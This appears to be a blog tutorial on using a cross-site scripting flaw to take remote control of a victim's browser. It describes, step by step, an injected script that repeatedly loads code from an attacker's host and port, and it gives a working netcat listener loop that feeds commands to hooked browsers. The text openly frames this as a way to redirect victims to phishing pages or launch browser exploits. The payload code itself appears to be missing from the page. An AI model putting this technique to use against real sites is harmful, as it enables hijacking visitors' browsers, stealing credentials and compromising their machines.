One of the greatest, yet overlooked, dangers of a XSS flaw is the possibility of control of the victim’s browser by an attacker.
Even if there’s no sessions or cookies to steal on a target website (or they are protected by HttpOnly), our XSS code can be used to redirect the victim to another website that can phish credentials or launch exploits against the browser and thus compromise the machine.
This control can be achieved quite easily without the need of any special tool, using just a Unix-like (linux and iOS, for examples) terminal and a common network utility, netcat (for some systems it’s not even necessary).
We need 2 pieces of code. The first one is the XSS payload to be injected into the target website:
We are grouping our steps (code) in a js function in order to make the setInterval() work.
Just an assignment to shorten the code.
The creation of a script element. Equals to document.createElement(“script”) because of the previous assignment.
Now we assign a source to the script element with a pair HOST:PORT (HOST as domain or IP), the ones from the machine which will be used to control the browser.
The element is appended to the body of the current HTML document.
Although less understandable, it can be shortened a little bit more (7 bytes less):
The second code is meant to be run on the terminal ($) of the attacker’s machine:
$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
It sets the listening on the PORT number (-lp) making use of netcat (nc) and redirecting the output (browser requests) to nowhere (>/dev/null). This is done in an endless loop (“while :” and “done”), printing the pseudo command prompt (j$) and reading the input from keyboard (read c) to feed the netcat listener (echo $c with the pipe to nc).
P.S.: when copy and paste these codes, delete and type the quotes again because they will not work in their current format of this blog theme.